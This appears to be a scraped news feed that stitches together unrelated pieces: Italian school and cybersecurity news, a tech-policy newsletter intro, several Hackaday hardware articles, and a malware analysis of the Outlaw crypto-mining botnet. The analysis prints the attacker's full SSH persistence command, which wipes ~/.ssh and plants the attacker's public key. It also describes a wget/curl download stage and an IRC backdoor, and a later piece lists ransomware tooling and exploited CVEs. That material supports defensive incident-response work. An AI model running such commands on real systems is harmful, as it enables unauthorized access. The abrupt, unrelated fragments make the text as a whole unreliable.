Sono stati firmati dal Ministro Giuseppe Valditara due decreti finalizzati all’attivazione dei percorsi di specializzazione sul sostegno previsti dal decreto legge 71 del 2024.
Il Ministro Giuseppe Valditara ha inviato alle scuole una circolare relativa alla programmazione delle verifiche in classe e all’assegnazione dei compiti da svolgere a casa.
Il Ministro Giuseppe Valditara ha inviato alle scuole una circolare relativa alla programmazione delle verifiche in classe e all’assegnazione dei compiti da svolgere a casa.
Qui tutti i dettagli ▶️ https://www.mim.gov.
Il fondatore di WikiLeaks, Julian Assange, ha reso un sentito omaggio a Papa Francesco in occasione delle sue esequie, manifestando rispetto e gratitudine per il Pontefice che, nel corso degli anni, si è interessato alla sua vicenda.
HOWDY GANG. THIS IS DIGITAL POLITICS. I'm Mark Scott, and will be in Brussels this week to interview Microsoft's president Brad Smith. You can watch along here on April 30, or put your name down here for one of the final in-person spots.
In other news, I was also just appointed as a member of an independent committee at the United Kingdom's Ofcom regulator to advise on issues related to the online information environment. More on that here.
— Canadians go to the polls on April 28 amid a barrage of online falsehoods. That won't stop Liberal leader Mark Carney almost certainly winning.
— There's a lot of politics to unpack behind the European Union's collective $790 million antitrust fine against Meta and Apple related to the bloc's new competition rules.
— Brussels spent $52 million in 2024 to implement its online safety regime. Those figures will rise by more than a quarter this year.
In a recent incident response case in Brazil, we dealt with a relatively simple, yet very effective threat focused on Linux environments. Outlaw (also known as “Dota”) is a Perl-based crypto mining botnet that typically takes advantage of weak or default SSH credentials for its operations. Previous research ([1], [2]) described Outlaw samples obtained from honeypots. In this article, we provide details from a real incident contained by Kaspersky, as well as publicly available telemetry data about the countries and territories most frequently targeted by the threat actor. Finally, we provide TTPs and best practices that security practitioners can adopt to protect their infrastructures against this type of threat.
Analysis
We started the analysis by gathering relevant evidence from a compromised Linux system. We identified an odd authorized SSH key for a user called suporte (in a Portuguese-speaking environment, this is an account typically used for administrative tasks in the operating system). Such accounts are often configured to have the same username as the password, which is a bad practice, making it easy for the attackers to exploit them. The authorized key belonged to a remote Linux machine user called mdrfckr, a string found in Dota campaigns, which raised our suspicion.
Suspicious authorized key
After the initial SSH compromise, the threat actor downloads the first-stage script, tddwrt7s.sh, using utilities like wget or curl. This artifact is responsible for downloading the dota.tar.gz file from the attackers’ server. Below is the sequence of commands performed by the attacker to obtain and decompress this file, which is rather typical of them. It is interesting to note that the adversary uses both of the previously mentioned utilities to try to download the artifact, since the system may not have one or another.
Chain of commands used by the attackers to download and decompress dota.tar.gz
After the decompression, a hidden directory, named ".configrc5", was created in the user’s home directory with the following structure:
.configrc5 directory structure
Interestingly enough, one of the first execution steps is checking if other known miners are present on the machine using the script a/init0. If any miners are found, the script tries to kill and block their execution. One reason for this is to avoid possible overuse of the RAM and CPU on the target machine.
Routine for killing and blocking known miners
The script also monitors running processes, identifies any that use 40% or more CPU by executing the command ps axf-o"pid %cpu", and for each such process, checks its command line (/proc/$procid/cmdline) for keywords like "kswapd0","tsm","rsync","tor","httpd","blitz", or "mass" using the grep command. If none of these keywords are found ( grep doesn’t return zero), the process is forcefully killed with the kill-9 command; otherwise, the script prints "don't kill", effectively whitelisting Outlaw’s known or expected high-CPU processes, so it doesn’t accidentally kill them.
Processes checks performed by the threat
After the process checks and killing are done, the b/run file is executed, which is responsible for maintaining persistence on the infected machine and executing next-stage malware from its code. For persistence purposes, the attackers used the following command to wipe the existing SSH setup, create a clean .ssh folder, add a new public key for SSH access, and lock down permissions. cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh The next-stage malware is a Base64-encoded string inside the b/run script that, once decoded, reveals another level of obfuscation: this time an obfuscated Perl script. Interestingly, the attackers left a comment generated by the obfuscator (perlobfuscator.com) in place.
Obfuscated Perl script
We were able to easily deobfuscate the code using an open-source script available on the same website as used by the attackers (perlobfuscator.com/decode-stun…), which led us to the original source code containing a few words in Portuguese.
Deobfuscated Perl script
This Perl script is an IRC-based botnet client that acts as a backdoor on a compromised system. Upon execution, it disguises itself as an rsync process, creates a copy of itself in the background, and ignores termination signals. By default, it connects to a hardcoded IRC server over port 443 using randomly generated nicknames, joining predefined channels to await commands from designated administrators. The bot supports a range of malicious features including command execution, DDoS attacks, port scans, file download, and upload via HTTP. This provides the attackers with a wide range of capabilities to command and control the botnet.
XMRig miner
Another file from the hidden directory, a/kswapd0, is an ELF packed using UPX, as shown in the image below. We were able to easily unpack the binary for analysis.
kswapd0 identification and unpacking
By querying the hash on threat intelligence portals and by statically analyzing the sample, it became clear that this binary is a malicious modified version of XMRig (6.19.0), a cryptocurrency miner.
XMRig version
We also found a configuration file embedded in the binary. This file contains the attacker’s mining information. In our scenario, the configuration was set up to mine Monero using the CPU only, with both OpenCL and CUDA (for GPU mining) disabled. The miner runs in the background, configured for high CPU usage. It also connects to multiple mining pools, including one accessible via Tor, which explains the presence of Tor files inside the .configrc5/a directory. The image below shows an excerpt from this configuration file.
XMRig custom configuration
Victims
Through telemetry data collected from public feeds, we have identified victims of the Outlaw gang mainly in the United States, but also in Germany, Italy, Thailand, Singapore, Taiwan, Canada and Brazil, as shown in the chart below.
Countries and territories where Outlaw is most active< (download)
The following chart shows the distribution of recent victims. We can see that the group was idle from December 2024 through February 2025, then a spike in the number of victims was observed in March 2025.
Number of Outlaw victims by month, September 2024–March 2025 (download)
Recommendations
Since Outlaw exploits weak or default SSH passwords, we recommend that system administrators adopt a proactive approach to hardening their servers. This can be achieved through custom server configurations and by keeping services up to date. Even simple practices, such as using key-based authentication, can be highly effective. However, the /etc/ssh/sshd_config file allows for the use of several additional parameters to improve security. Some general configurations include:
Port <custom_port_number>: changes the default SSH port to reduce exposure to automated scans.
Protocol 2: enforces the use of the more secure protocol version.
PermitRootLogin no: disables direct login as the root user.
MaxAuthTries <integer>: limits the number of authentication attempts per session.
LoginGraceTime <time>: defines the amount of time allowed to complete the login process (in seconds unless specified otherwise).
Disable tunneling options to prevent misuse of the SSH tunnel feature:
AllowAgentForwarding no
AllowTcpForwarding no
PermitTunnel no
You can limit SSH access to specific IPs or networks using the AllowUsers directive:
AllowUsers *@10.10.10.217
AllowUsers *@192.168.0.0/24
Enable public key authentication with:
PubkeyAuthentication yes
Set parameters to automatically disconnect idle sessions:
ClientAliveInterval <time>
ClientAliveCountMax <integer>
The following configuration file serves as a template for hardening the SSH service: Protocol 2 Port 2222
LoginGraceTime 10 PermitRootLogin no MaxAuthTries 3 IgnoreRhosts yes PubkeyAuthentication yes PasswordAuthentication no PermitEmptyPasswords no
UsePAM yes ChallengeResponseAuthentication no KerberosAuthentication no GSSAPIAuthentication no
AllowAgentForwarding no AllowTcpForwarding no X11Forwarding no PrintMotd no PrintLastLog yes PermitUserEnvironment no ClientAliveInterval 300 ClientAliveCountMax 2 PermitTunnel no
Banner /etc/ssh/custom_banner AllowUsers *@10.10.10.217 While outside sshd_config, pairing your config with tools like Fail2Ban or firewalld rate limiting adds another solid layer of protection against brute force.
Conclusion
By focusing on weak or default SSH credentials, Outlaw keeps improving and broadening its Linux-focused toolkit. The group uses a range of evasion strategies, such as concealing files and folders or obfuscated programs, and uses compromised SSH keys to keep access for as long as possible. The IRC-based botnet client facilitates a wide range of harmful operations, such as command execution, flooding, and scanning, while the deployment of customized XMRig miners can divert processing resources to cryptocurrency mining. By hardening SSH configurations (for instance, turning off password authentication), keeping an eye out for questionable processes, and limiting SSH access to trustworthy users and networks, system administrators can greatly lessen this hazard.
Tactics, techniques and procedures
Below are the Outlaw TTPs identified from our malware analysis.
On a Commodore 64, the computer is normally connected to a monitor with one composite video cable and to an audio device with a second, identical (although uniquely colored) cable. The signals passed through these cables are analog, each generated by a dedicated chip on the computer. Many C64 users may have accidentally swapped these cables when first setting up their machines, but [Matthias] wondered if this could be done purposefully — generating video with the audio hardware and vice versa.
Getting an audio signal from the video hardware on the Commodore is simple enough. The chips here operate at well over the needed frequency for even the best audio equipment, so it’s a relatively straightforward matter of generating an appropriate output wave. The audio hardware, on the other hand, is much less performative by comparison. The only component here capable of generating a fast enough signal to be understood by display hardware of the time is actually the volume register, although due to a filter on the chip the output is always going to be a bit blurred. But this setup is good enough to generate large text and some other features as well.
There are a few other constraints here as well, namely that loading the demos that [Matthias] has written takes so long that the audio can’t be paused while this happens and has to be bit-banged the entire time. It’s an in-depth project that shows mastery of the retro hardware, and for some other C64 demos take a look at this one which is written in just 256 bytes.
A quadrature encoder provides a way to let hardware read movement (and direction) of a shaft, and they can be simple, effective, and inexpensive devices. But [Paulo Marques] observed that when it comes to reading motor speeds with them, what works best at high speeds doesn’t work at low speeds, and vice versa. His solution? PicoEncoder is a library providing a lightweight and robust method of using the Programmable I/O (PIO) hardware on the RP2040 to get better results, even (or especially) from cheap encoders, and do it efficiently. The results of the sub-step method (blue) resemble a low-pass filter, but is delivered with no delay or CPU burden. The output of a quadrature encoder is typically two square waves that are out of phase with one another. This data says whether a shaft is moving, and in what direction. When used to measure something like a motor shaft, one can also estimate rotation speed. Count how many steps come from the encoder over a period of time, and use that as the basis to calculate something like revolutions per minute.
[Paulo] points out that one issue with this basic method is that the quality depends a lot on how much data one has to work with. But the slower a motor turns, the less data one gets. To work around this, one can use a different calculation optimized for low speeds, but there’s really no single solution that handles high and low speeds well.
Another issue is that readings at the “edges” of step transitions can have a lot of noise. This can be ignored and assumed to average out, but it’s a source of inaccuracy that gets worse at slower speeds. Finally, while an ideal encoder has individual phases that are exactly 50% duty cycle and exactly 90 degrees out of phase with one another. This is almost never actually the case with cheaper encoders. Again, a source of inaccuracy.
[Paulo]’s solution was to roll his own method with the RP2040’s PIO, using a hybrid approach to effect a “sub-step” quadrature encoder. Compared to simple step counting, PicoEncoder more carefully tracks transitions to avoid problems with noise, and even accounts for phase size differences present in a particular encoder. The result is a much more accurate calculation of motor speed and position without any delays. Most of the work is done by the PIO of the RP2040, which does the low-level work of counting steps and tracking transitions without any CPU time involved. Try it out the next time you need to read a quadrature encoder for a motor!
The PIO is one of the more interesting pieces of functionality in the RP2040 and it’s great to see it used in a such a clever way. As our own Elliot Williams put it when he evaluated the RP2040, the PIO promises never having to bit-bang a solution again.
It’s not unusual for redundant satellites, rocket stages, or other spacecraft to re-enter the earth’s atmosphere. Usually they pass unnoticed or generate a spectacular light show, and very rarely a few pieces make it to the surface of the planet. Coming up though is something entirely different, a re-entry of a redundant craft in which the object in question might make it to the ground intact. To find out more about the story we have to travel back to the early 1970s, and Kosmos-482. It was a failed Soviet Venera mission, and since its lander was heavily over-engineered to survive entry into the Venusian atmosphere there’s a fascinating prospect that it might survive Earth re-entry. This model of the earlier Venera 7 probe shows the heavy protection to survive entry into the Venusian atmosphere. Emerezhko, CC BY-SA 4.0. At the time of writing the re-entry is expected to happen on the 10th of May, but as yet due to its shallow re-entry angle it is difficult to predict where it might land. It is thought to be about a metre across and to weigh just under 500 kilograms, and its speed upon landing is projected to be between 60 and 80 metres per second. Should it hit land rather than water then, its remains are thought to present an immediate hazard only in its direct path.
Were it to be recovered it would be a fascinating artifact of the Space Race, and once the inevitable question of its ownership was resolved — do marine salvage laws apply in space? –we’d expect it to become a world class museum exhibit. If that happens, we look forward to bringing you our report if possible.
If you’ve only been around for the Internet age, you may not realize that Hackaday is the successor of electronics magazines. In their heyday, magazines like Popular Electronics, Radio Electronics, and Elementary Electronics brought us projects to build. Hacks, if you will. Just like Hackaday, not all readers are at the same skill level. So you’d see some hat with a blinking light on it, followed by some super-advanced project like a TV typewriter or a computer. Or a picture phone.
In 1982, Radio Electronics, a major magazine of the day, showed plans for building a picture phone. All you needed was a closed-circuit TV camera, a TV, a telephone, and about two shoeboxes crammed full of parts.
Like many picture phones of its day, it was stretching the definition a little. It actually used ham radio-style slow scan TV (SSTV) to send a frame of video about once every eight seconds. That’s not backwards. The frame rate was 0.125 Hz. And while the resulting 128 x 256 image would seem crude today, this was amazing high tech for 1982.
Slow Scan for the Win
Hams had been playing with SSTV for a long time. Early experiments used high-persistence CRTs, so you’d see the image for as long as the phosphor kept glowing. You also had to sit still for the entire eight seconds to send the picture.
It didn’t take long for hams to take advantage of modern circuits to capture the slow input and convert it to a normal TV signal for as long as you wanted, and that’s what this box does as well. Early “scan converters” used video storage tubes that were rejects (because a perfect new one might have cost $50,000). However, cheap digital memory quickly replaced these storage tubes, making SSTV more practical and affordable. One of Mitsubishi’s Picture Phones Still, it never really caught on for telephone networks. A few years later, a few commercial products offered similar tech. Atari made a phone that was bought up by Mitsubishi and sold as the Luna, for example, around 1986. Mitsubishi, Sony, and others tried, unsuccessfully, to get the market to accept these slow picture phones. Between the cost of making a call and a minimum of $400 to buy one, though, it was a hard sell.
You might think this sounds like a weekend project with a Pi-Cam, and you are probably right if you did it now. But in 1982, the amount of work it took to make this work was significant. It helped that it used MM5280 dynamic RAM chips, which held a whopping 4,096 bits (not bytes) of memory. The project needed 16 of the chips, which, at the time, were about $5 each. Remember that $80 in those days was a lot more than $80 today, and you had to buy the rest of the parts, the camera (the article estimates that’s $150, alone), and so on. This wasn’t a poor high school student project.
Robot Kits
You could buy entire kits or just key parts, which was a common thing for magazines to do in those days. The kits came from Robot Research, which was known for making SSTV equipment for hams, so it makes sense that they knew how to do this. The author mentions that “this project is not for beginners.” He explains there are nearly 100 ICs on a “tightly-packed double-sided PC board.”
The device had two primary inputs: fast scan from the camera and slow scan from the phone line. Both could be digitized and stored in the memory array. The memory can also output fast scan TV for the monitor or slow scan for the phone line. Obviously, the system was half duplex. If you were sending a picture, you wouldn’t expect to receive a picture at the same time. This is just the main board! The input conversion is done with comparators for speed. Luckily, the conversion is only four bits of monochrome, so you only need 16 (IC73-80) to get the job done. The memory speed was also a concern. Each memory chip’s enable line activated while the previous chip’s was half way through with a cycle.
Since there is no microcontroller, the design includes plenty of gates, op amps, bipolar transistors, and the like. The adjacent picture shows just the device’s main board!
Lots of Parts
If you want to dig into the details, you’ll also want to look at part 2. There’s more theory of operation there and the parts list. The article notes that you could record the tones to a cassette tape for later playback, but that you’d “probably need a device from your local phone company to couple the Picture Phone to their lines.” Ah, the days of the DAA.
They even noted in part 2 that connecting a home-built Picture Phone directly to the phone lines was illegal, which was true at the time. Part 3 talks even more about the phone interface (and, that same issue has a very cool roundup of all the computers you could buy in 1982, ranging from $100 to $6,000). Part 4 was all about alignment and yet more about the phone interface.
Alignment shouldn’t have been too hard. The highest tone on the phone line was 2,300 Hz. While there are many SSTV standards today for color images, this old-fashioned scheme was simple: 2,300 Hz for white and 1,500 Hz for black. A 1,200 Hz tone provided sync signals. Interestingly, sharp jumps in color could create artifacts, so the converters use a gray code to minimize unnecessary sharp jumps in value.
The Phone Book
It wouldn’t make sense to make only one of these, so we wonder how many pairs were built. The magazine did ask people to report if they had one and intended to publish a picture phone directory. We don’t know if that ever happened, but given what a long-distance phone call cost in 1982, we imagine that idea didn’t catch on.
The video phone was long a dream, and we still don’t have exactly what people imagined. We would really like to replicate this picture phone on a PC using GNU Radio, for example.
Image by [BFB_Workshop] via redditIf you use a true split, even if you never leave the house, you know the pain of losing the good angle and/or separation you had going on for whatever reason. Not only does this monoblock split solve that simply by being a monoblock split, you can always find the right angle you had via the built-in angle finder.
[BFB_Workshop] used a nice!nano v2, but you could use any ZMK-supported board with the same dimensions. This 5 x 12 has 60 Gateron KS-33 switches, which it was made for, and has custom keycaps. You can, of course, see all the nice, neat ribbon cable wiring through the clear PLA, which is a really great touch.
This bad boy is flat enough that you can use the table as your palm rest. To me, that doesn’t sound so comfortable, but then again, I like key wells and such. I’d still love to try a Protractor, because it looks quite interesting to type on. If you want to build one, the files and instructions are available on Printables.
Present Arms: the AR-60%
Image by [Sli22ard] via redditYes I stole that joke, sort of. Don’t shoot! Anyway, as [Sli22ard] asks, does your keyboard have a mil-spec stock? I’m guessing no, although you might have a knife nearby. I myself have a fancy-handled butter knife for opening mail.
This is [Sli22ard]’s latest “abomination”, and the best part is that the MOE fixed carbine stock folds up so that the whole thing fits on the ever-important keyboard display. (Click to the second picture and be sure to admire the Dreamcast that was in storage for however long.)
The case is a Keysme Pic60, custom Cerakoted, with a 4pplet waffling60 PCB within its walls. That case is meant to have things hanging off the upper left corner, so that must have been a great place to start as far as connecting up the stock.
[Sli22ard] used Gateron Type R switches and a NovelKeys Cream Arc switch for the Spacebar. Most of the keycaps are GMK Striker, with the 10u Spacebar from Awekeys.
I particularly like the midnight-y keycaps along with that monster gold Spacebar. [Sli22ard] says it thocks like nobody’s business, and I believe it.
The Centerfold: the Quiet Type
Image by [Pleasant_Dot_189] via reddit[Pleasant_Dot_189] sure has a pleasant research-only battlestation, don’t they? Sure, there are four screens, but there’s no RGB, and the only plant can safely be ignored for weeks at a time. Why four screens? This way, [Pleasant_Dot_189] doesn’t have to switch between tasks or tabs and can just write as they work on their fifth book.
Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!
Historical Clackers: the Malling-Hansen Takygraf
The astute among you will remember that we’ve covered the Malling-Hansen Writing Ball, the more well-known offering from M-H. Well, this here is the Malling-Hansen Takygraf (or Takygraph, depending upon where you are in the world), and it was quite the writing machine. Only one was created, and its whereabouts are unknown. Image via The Malling-Hansen Society Rasmus Malling-Hansen’s intention was to create a typewriter that could type at the speed of human speech. And he succeeded — the Takygraf could reach speeds of 1200 characters per minute. He hoped the Takygraf would be used for stenography.
The VP of the Malling-Hansen Society describes the function of the Takygraf as follows: “The first Takygraf from 1872 was combined with a writing ball but the bottom of each piston forms a blunt point and so it forms only impressions in the paper. The paper band was prepared to conduct electricity. Under the paper band there were metal points which were connected to electromagnets. The form impressions in the paper band are brought in contact with the fixed metal points under the paper as the paper moves along and so the corresponding electromagnets are brought into action. When the electromagnets attracted the keepers, then the types made their impressions on the paper band (through the invention of a colored or carbonized strip of paper).
In the year 1874 follows a modified Takygraf combined with a writing ball but instead of the prepared paper (to conduct electricity) and the form impressions in the paper Rasmus Malling-Hansen developed a mechanical memory-unit, which contacts the electromagnets in the right time to make the needed type impressions on the paper band. It was possible to write with this brilliant invention as fast as we talk.”
Actually, the Cleaver is another aluminium keyboard, not the Icebreaker from a couple Keebins ago. But they’re from the same company, and the idea is basically the same. Aluminium wherever possible, and tiny, laser-cut holes that make up the legends. At least these are more legible. Image by Serene Industries via Yanko Design And, whereas the Icebreaker definitely doubled as bludgeoning device, the Cleaver is much slimmer and more streamlined. Both are machined from a single block of aluminium.
Much like its predecessor, the Cleaver is a Hall-effect keyboard, which I would really like to type on someday while I consider how they can never really wear out in the traditional switch sense.
Inside the metal block, the electronics are huddled away from its raw power inside of a silicone core. This is meant to enhance the typing acoustics, protect against dust, sweat, and coffee, and has the added effect of popping out the underside to be a nice, non-slip foot.
Unlike the Icebreaker, which started at $2100, the pre-order price for the Cleaver is a mere $850. And to get this one in black? Still just $850. I’m curious to know how much it weighs, since it’s much more portable-looking. The Cleaver would be an icebreaker for sure.
Continuous glucose meters (CGMs) aren’t just widgets for the wellness crowd. For many, CGMs are real-time feedback machines for the body, offering glucose trendlines that help people rethink how they eat. They allow diabetics to continue their daily life without stabbing their fingertips several times a day, in the most inconvenient places. This video by [Becky Stern] is all about comparing two of the most popular continuous glucose monitors (CGMs): the Abbott Libre 3 and the Dexcom G7.
Both the Libre 3 and the G7 come with spring-loaded applicators and stick to the upper arm. At first glance they seem similar, but the differences run deep. The Libre 3 is the minimalist of both: two plastic discs sandwiching the electronics. The G7, in contrast, features an over-molded shell that suggests a higher production cost, and perhaps, greater robustness. The G7 needs a button push to engage, which users describe as slightly clumsy compared to the Libre’s simpler poke-and-go design. The nuance: G7’s ten-day lifespan means more waste than the fourteen-day Libre, yet the former allows for longer submersion in water, if that’s your passion.
While these devices are primarily intended for people with diabetes, they’ve quietly been adopted by a growing tribe of biohackers and curious minds who are eager to explore their own metabolic quirks. In February, we featured a dissection of the Stelo CGM, cracking open its secrets layer by layer.
As transport infrastructure in Europe moves toward a zero-carbon future, there remain a number of railway lines which have not been electrified. The question of replacing their diesel traction with greener alternatives, and there are a few different options for a forward looking railway company to choose from. In Germany the Rhine-Main railway took delivery of a fleet of 27 Alstom hydrogen-powered multiple units for local passenger services, but as it turns out they have not been a success (German language, Google translation.). For anyone enthused as we are about alternative power, this bears some investigation.
It seems that this time the reliability of the units and the supply of spare parts was the issue, rather than the difficulty of fuel transport as seen in other failed hydrogen transport problems, but whatever the reason it seems we’re more often writing about hydrogen’s failures than its successes. We really want to believe in a hydrogen future in which ultra clean trains and busses zip around on hydrogen derived from wind power, but sadly that has never seemed so far away. Instead trains seem inevitably to be following cars, and more successful trials using battery units point the way towards their being the future.
We’re sure that more hydrogen transport projects will come and go before either the technological problems are overcome, or they fade away as impractical as the atmospheric railway. Meanwhile we’d suggest hydrogen transport as the example when making value judgements about technology.
L’intrusione, riconosciuta come un’azione malevola, è stata fortunatamente circoscritta a un singolo punto vendita. L’azienda, in linea con la normativa vigente, ha immediatamente informato le autorità competenti e ha proceduto a mettere in sicurezza il sistema compromesso. Le indagini interne condotte da WindTre hanno permesso di stabilire che l’incidente ha comportato la visualizzazione e, in alcuni casi, la possibile esfiltrazione di dati personali comuni. Tra le informazioni potenzialmente compromesse si annoverano dati anagrafici quali nome, cognome, indirizzo e recapiti. L’azienda ha precisato che, anche se l’evento è stato contenuto, non si può escludere che anche i dati di alcuni clienti siano stati coinvolti.
A fronte dell’accaduto, WindTre ha ribadito il proprio impegno nella protezione dei dati personali, dichiarando di aver immediatamente adottato misure aggiuntive per prevenire il ripetersi di episodi simili. Tra queste, l’introduzione di tecnologie più avanzate per la sicurezza informatica. L’azienda invita i propri clienti a mantenere alta l’attenzione rispetto a comunicazioni sospette ricevute via telefono, SMS, email o WhatsApp. Viene inoltre raccomandato di monitorare eventuali profili falsi sui social network. Un altro suggerimento utile riguarda la creazione di password “forti”, che seguano criteri minimi di complessità.
WindTre ha messo a disposizione diversi canali di assistenza per fornire supporto ai clienti potenzialmente coinvolti. È possibile contattare il servizio clienti al numero 159, scrivere al Data Protection Officer all’indirizzo dedicato (dataprotectionofficer@windtre.it) oppure chiamare il numero verde 800591854, attivo tutti i giorni dalle 10:00 alle 19:00, per ricevere chiarimenti o segnalare eventuali anomalie.
La comunicazione rientra nelle disposizioni previste dall’articolo 34 del Regolamento Europeo sulla protezione dei dati personali (GDPR), che obbliga i titolari del trattamento a informare tempestivamente gli interessati in caso di violazioni che possano comportare un rischio elevato per i loro diritti e le loro libertà.
Hitachi Vantara, una sussidiaria della multinazionale giapponese Hitachi, è stata costretta a disattivare i propri server durante il fine settimana per contenere l’attacco ransomware Akira.
Hitachi Vantara fornisce servizi di archiviazione dati, sistemi infrastrutturali, gestione del cloud computing e ripristino da ransomware. Collabora con agenzie governative e con i più grandi marchi del mondo, tra cui BMW, Telefónica, T-Mobile e China Telecom.
Secondo Bleeping Computer, Hitachi Vantara ha riconosciuto di aver subito un attacco ransomware e ha affermato di aver incaricato esperti di sicurezza informatica esterni di indagare sull’incidente e di essere al lavoro per ripristinare la funzionalità di tutti i sistemi interessati.
“Il 26 aprile 2025, Hitachi Vantara è stata vittima di un attacco ransomware che ha causato l’interruzione di alcuni dei nostri sistemi”, ha affermato Hitachi Vantara. — Dopo aver rilevato attività sospette, abbiamo immediatamente attivato protocolli di risposta agli incidenti e coinvolto esperti terzi in materia per condurre un’indagine e attenuare le conseguenze. Inoltre, per contenere l’incidente, abbiamo preventivamente disattivato i nostri server.”
Sebbene l’azienda non abbia attribuito l’attacco a nessun gruppo di hacker specifico, i giornalisti hanno riferito che dietro l’attacco c’è il gruppo Akira. La fonte stessa della pubblicazione, a conoscenza della situazione, ha riferito che gli hacker hanno rubato file dalla rete Hitachi Vantara e hanno lasciato richieste di riscatto sui computer hackerati. È stato inoltre segnalato che, sebbene i servizi cloud dell’azienda non siano stati colpiti, i sistemi Hitachi Vantara e Hitachi Vantara Manufacturing sono stati disattivati durante i lavori di localizzazione dell’attacco. Allo stesso tempo, i clienti con ambienti self-hosted possono accedere ai propri dati come di consueto.
Un’altra fonte ha riferito alla pubblicazione che l’attacco ha colpito una serie di progetti non specificati appartenenti a organizzazioni governative.
Il gruppo di hacker Akira è attivo da marzo 2023. Nel corso degli anni, il gruppo ha elencato oltre 300 organizzazioni sul suo sito di data dump e ha preso di mira numerose aziende e istituzioni di alto profilo, tra cui la Stanford University e Nissan (in Australia e Nuova Zelanda).
Secondo l’FBI, ad aprile 2024, Akira aveva compromesso più di 250 organizzazioni e riscosso più di 42 milioni di dollari in riscatti dalle sue vittime.
Negli ultimi anni, abbiamo assistito all’evoluzione incessante delle minacce cyber, che da semplici attacchi opportunistici si sono trasformati in operazioni altamente strutturate, capaci di colpire bersagli eterogenei su scala globale. L’ultimo caso degno di nota è quello descritto nel report pubblicato da The DFIR Report, che ci guida alla scoperta di un’infrastruttura malevola associata a un affiliato del gruppo Fog Ransomware.
Questa analisi rivela non solo le tecniche offensive impiegate, ma anche l’intelligenza e la pianificazione dietro l’intera catena di attacco, che ha coinvolto numerosi strumenti noti nel mondo del red teaming e dell’ethical hacking, piegati però a scopi criminali.
Origine dell’attacco: accesso iniziale tramite VPN compromessa
Il punto di partenza dell’intera operazione è riconducibile a un classico, ma sempre efficace, vettore di accesso iniziale: l’utilizzo di credenziali compromesse per connettersi a una SonicWall VPN esposta pubblicamente. In questo caso, non si parla di exploit di vulnerabilitàzero-day, ma dell’abuso di password deboli o già trafugate e circolanti nel dark web. Ancora una volta, si conferma quanto la gestione delle credenziali e l’assenza di autenticazione multifattoriale siano tra i principali talloni d’Achille delle infrastrutture aziendali.
Il contenuto dell’open directory scoperta – rivelatosi un vero e proprio toolkit offensivo – ha permesso agli analisti di ricostruire con estrema precisione le varie fasi dell’attacco. Gli strumenti rinvenuti, pur essendo noti e disponibili in contesti di test o formazione, sono stati qui utilizzati con finalità del tutto malevole:
SonicWall Scanner: per l’individuazione automatizzata di dispositivi VPN esposti e potenzialmente vulnerabili.
Sliver C2: una piattaforma Command & Control alternativa a Cobalt Strike, capace di gestire payload e comunicazioni crittografate, oltre a offrire strumenti di evasione e pivoting avanzati.
DonPAPI: strumento pensato per estrarre credenziali dal Windows DPAPI, spesso sottovalutato ma estremamente efficace per recuperare segreti utente da browser e altri software.
Certipy: specializzato nello sfruttamento delle vulnerabilità certificate-based presenti in Active Directory, come attacchi relaying su servizi di autenticazione.
Zer0dump, noPac e Pachine: impiegati per escalation dei privilegi, attacchi relaying NTLM e abuso delle deleghe Kerberos, in particolare tramite combinazioni che coinvolgono le vulnerabilità CVE-2021-42278 e CVE-2021-42287.
Un elemento particolarmente interessante è l’impiego di AnyDesk, utilizzato come meccanismo di persistenza. Il software è stato distribuito e installato silenziosamente tramite PowerShell script preconfigurati, con l’obiettivo di mantenere l’accesso ai sistemi anche in caso di reboot o revoca delle credenziali.
Tecniche MITRE ATT&CK in uso
Il grafo relazionale allegato al report e qui riportato fornisce una rappresentazione visiva straordinariamente dettagliata dei collegamenti tra attori, tecniche, vulnerabilità e settori colpiti. Le tecniche impiegate coprono diverse fasi della kill chain:
Le vulnerabilità sfruttate
Gli attaccanti si sono avvalsi di tre vulnerabilità note, ma ancora ampiamente presenti in molte realtà aziendali:
CVE-2021-42287: consente ad un utente autenticato di impersonare un altro account, specialmente in combinazione con exploit AD.
CVE-2021-42278: abusa dei record DNS e dei nomi computer per ottenere escalation privilegi.
CVE-2020-1472 (Zerologon): uno degli exploit più devastanti degli ultimi anni, consente di ottenere il controllo completo di un domain controller sfruttando l’algoritmo di autenticazione Netlogon.
Queste vulnerabilità, sebbene pubbliche da tempo, rappresentano un pericolo persistente a causa della lentezza di alcune organizzazioni nell’applicare patch o mitigazioni strutturate.
Target colpiti: una minaccia globale e trasversale
Il gruppo Fog Ransomware si distingue per l’ampiezza geografica e settoriale dei suoi bersagli. Il grafo mostra chiaramente l’attività mirata contro:
Nazioni coinvolte:
🇺🇸 Stati Uniti d’America
🇮🇹 Italia
🇧🇷 Brasile
🇬🇷 Grecia
Settori economici colpiti:
🛒 Retail
🎓 Education
🖥️ Technology
🚚 Transportation
Questa distribuzione evidenzia una strategia non opportunistica ma pianificata, basata su analisi di impatto, disponibilità delle superfici di attacco e, probabilmente, capacità di pagamento del riscatto.
Considerazioni finali
Ci troviamo di fronte a un caso emblematico in cui l’integrazione di strumenti noti (alcuni persino open source), l’automazione di task offensivi tramite scripting e l’uso di vulnerabilità non zero-day danno vita a una campagna ransomware efficace e su larga scala.
La professionalizzazione del cybercrime e l’accessibilità degli strumenti di attacco rendono necessaria una nuova consapevolezza da parte delle aziende. Non si tratta solo di aggiornare i sistemi, ma di ripensare completamente la propria postura di sicurezza:
Messa in sicurezza dei controller di dominio e delle infrastrutture Active Directory
Monitoraggio continuo delle anomalie tramite strumenti EDR e SIEM
Segmentazione delle reti interne
Disabilitazione dei protocolli obsoleti (come Netlogon non sicuro)
Il gruppo Fog Ransomware ci ricorda che, nel mondo delle minacce informatiche, l’unica nebbia ammissibile è quella che avvolge gli attaccanti nei nostri sistemi di deception. Ma noi, oggi più che mai, dobbiamo vedere chiaro.
